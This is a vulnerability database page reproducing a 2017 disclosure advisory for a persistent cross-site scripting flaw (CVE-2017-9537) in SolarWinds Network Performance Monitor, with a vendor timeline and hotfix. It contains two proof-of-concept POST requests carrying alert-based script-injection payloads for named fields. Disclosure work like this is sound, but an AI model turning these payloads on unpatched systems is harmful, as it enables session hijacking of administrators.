Vulners
Lucene search
SolarWinds Network Performance Monitor 12.0.15300.90 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | SolarWinds Network Performance Monitor 12.0.15300.90 Cross Site Scripting Vulnerability | 30 Sep 201700:00 | – | zdt |
 | SolarWinds Network Performance Monitor Cross-Site Scripting Vulnerability | 1 Nov 201700:00 | – | cnvd |
 | CVE-2017-9537 | 2 Oct 201714:00 | – | cve |
 | CVE-2017-9537 | 2 Oct 201714:00 | – | cvelist |
 | EUVD-2017-18468 | 7 Oct 202500:30 | – | euvd |
 | CVE-2017-9537 | 3 Oct 201701:29 | – | nvd |
 | SolarWinds Orion NPM 12.0.15300.90 Multiple Vulnerabilities | 21 Nov 201700:00 | – | openvas |
 | CVE-2017-9537 | 3 Oct 201701:29 | – | osv |
 | Cross site scripting | 3 Oct 201701:29 | – | prion |
`-------------------------------------------------------------
Vulnerability type: Persistent Cross-Site Scripting
-------------------------------------------------------------
Credit: Andy Tan
CVE ID: CVE-2017-9537
-----------------------------------------------
Product: SolarWinds Network Performance Monitor
-----------------------------------------------
Affected version: SolarWinds Network Performance Monitor version 12.0.15300.90 and possibly earlier
Hotfix: SolarWinds Orion Platform 2017.3 Hotfix 1
1.
Affected URL: https://<ip>/Orion/Nodes/Add/Properties.aspx
Affected parameter: City, Comments, Department
Affected functions: Group Description field, Last_XX_Events resource, Events page, and error page
Navigation: (Settings -> Manage Nodes -> Add Node)
2.
Affected Source URL: https://<ip>/Orion/Services/WebAdmin.asmx/CreateExternalWebsite
Affected parameter: FullTitle
Affected URL: https://<ip>/Orion/External.aspx?Site=<no>
Navigation: (Settings -> All Settings -> External Websites)
================
Proof of Concept
================
1.
POST /Orion/Nodes/Add/Properties.aspx HTTP/1.1
<Fill up rest of the headers>
<Fill up rest of the parameters>ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl00%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSCity')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl01%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSComments')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl02%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSDept')%3E
2.
POST /Orion/Services/WebAdmin.asmx/CreateExternalWebsite HTTP/1.1
<Fill up rest of the headers>
{"site":{"ID":0,"ShortTitle":"title","FullTitle":"</title><script>alert('DTPTXSS!')</script>","URL":"url"},"menuBar":"Default"}
------------------------
Vendor contact timeline:
------------------------
2017-06-12: Contacted vendor.
2017-06-23: Vendor responded that bug jury completed and vulnerability is assigned to vNext milestone.
2017-08-22: Contacted vendor again.
2017-08-23: Vendor responded that hotfix will be released for all products shipping on Orion Core 2017.3
2017-09-28: Contacted vendor again.
2017-09-28: Vendor responded that the vulnerability is addressed in the recently released Hotfix for Core 2017.3
2017-09-29: Public disclosure.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Sep 2017 00:00Current
5.2Medium risk
Vulners AI Score5.2
EPSS0.01302